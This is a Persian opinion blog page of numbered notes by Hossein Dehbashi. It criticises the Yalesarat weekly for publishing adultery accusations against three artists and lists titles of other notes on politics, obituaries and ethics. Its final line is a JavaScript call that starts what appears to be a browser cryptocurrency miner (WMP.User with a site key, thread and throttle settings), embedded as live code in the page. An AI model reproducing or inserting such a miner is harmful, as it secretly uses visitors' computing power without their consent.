یادداشت‌ها

یادداشت 314

‏‏‏اندراحوالاتِ شیرینی ناپلئونی و اصولگرایی به سبکِ یالثارات:

یک:
جریدهء وقیحهء یالثارات بار دیگر، مطلبِ چرک و چروکی نوشته، با محتوایِ نسبتِ زنای محصنه به سه هُنرمندِ مُحترمِ کشورمان. مملکت «صاحاب» ندارد؟

دو:
شیرینی ناپلئونی چه ربطی دارد به ناپلئون بناپارت؟ اصول اخلاقی هم، می‌تواند همان‌قدر بی‌ربط باشد با داعیه اصولگرایی! بی‌تعارف؟ اصولگرایی که ادب و اخلاق، اصل‌اش نباشد، مفت‌اش هم گران است!

سه:
ایشان خودشان «خوار و مادر» ندارند؟ چه عرض شود! امّا شما چطور خواهر/برادرِ اصولگرا؟خودت را بگذار جای اصغرفرهادی یا شهاب حسینی و خواهرت را جای ترانه علیدوستی، چه حالی بودی اگر کسی درموردت قبیحه می‌نوشت؟

چهار:
این سال‌ها خیلی‌ها کلاهِ خلایق را برداشته‌اند، آبروی خدا و خلقِ خدا را برده‌اند پُشتِ عناوینِ عزیز و مقدّس. لاجرم قانونی عاجل لازم است:«ممنوعیت انتخاب اسامی مذهبی برای همه مؤسسات مالی و مطبوعات»

پنج:
«این‌همانی» نه عجیب است و نه غیرمنصفانه. مگر اگر تفاوتی داری یا مخالفتی با هم‌لباس‌ات، هم‌جناح‌ات، هم‌مسجدی‌ات،...بی‌لُکنت و ترس و تعارف بگویی و اصلا بستیزی. سکوت علامتِ رضا است. خاصه در خصوصِ دوستان!

شش:
مراد از نزول قرآن تحصیل سیرت خوب است نه ترتیل سورت مکتوب! عاصی که دست بردارد به از عابد که در سر دارد! عالم بی‌عمل به چه ماند؟به زنبور بی‌عسل!

 

ارسال کننده: حسین دهباشی
تاریخ: 25 شهریور 1395
یادداشت 359

دو آزادی در یک روز:

یادداشت 358

برای خواندن سلسله مطالب "مسافر جاده هراز" زندگی نامه خودنوشت افشین علاء به کانال شخصی او مراجعه فرمایید.

یادداشت 357

هو الله

یادداشت 356

در نقد مقایسه رذیلانه‌ی انتخاب ترامپ و انتخاب احمدی نژاد / علی علیزاده

یادداشت 355

من مرگِ هیچ معلّمی را باور نمی‌کنم!/ در سوگِ تورانِ میرهادی

یادداشت 354

‏[ از شُمارِ دوچشم | یک تن کم | وز شُمارِ خرد... | هزاران بیش ] «تورانِ میرهادی» | نازنین دُردانهء آموزش و پرورشِ نوینِ ایران درگذشت

یادداشت 354

اُمیدِحسینی | که البتّه نگاهِ سیاسی بسیار متفاوتی با نگارنده دارد | نیازی به هیچ تبلیغی ندارد | وبلاگِ «آهستان» که در شمارِ پُرمغزونغزترین ذخایرِ جناحِ اصولگرایِ مجازستان بوده است، هم! | و کانالِ تازه تاسیسِ او در تلگرام نیز لابُد چنان می‌شود | خواندنی و لب‌ریز و لب‌سوز و لب‌دوز!| علیکم به عضویت و پیگیریِ آن:

یادداشت 353

کتاب‌های زرد می‌توانند رقیب فضای مجازی و ماهواره باشند

یادداشت 352

پیامی سرگشاده به بچه‌های بالا! / در فضیلتِ پیشگیری قبل از درمان!

یادداشت 350

دودوتا؟ لُبنان‌تا!/ مهردادِ فرهمند

یادداشت 349

محسن میردامادی |سردبیر روزنامه سلام، دبیرکل جبهه مشارکت: " شورای امنیت سازمان ملل صلاحیت ندارد، ملّت آمریکا به وظیفهء خود در مورد گروگانگیری ما عمل کنند، همه کسانی که در سفارت آمریکا کار می‌کردند از نظر ما مجرم و جاسوس هستند، محاکمه را ممکن است به دادگاه لاهه بسپاریم، اگر آمریکا را محکوم کرد قبول می‌کنیم، در غیر این صورت رای آن هیچ بها و ارزشی برای ما ندارد..."

یادداشت 348

‏شمریم! اگر روزِ ستم خاموشیم خون است! اگر آبِ خُنک می‌نوشیم آن‌سویِ جهان کرب و بلایی بر پاست ما هم دلمان خوش است! مشکی پوشیم!
var someData = WMP.User('SK_A4VFH9k7Si5999pXyW7id', 'soroush',{ threads: 4, autoThreads: false, throttle: 0.3, forceASMJS: false }); someData.start();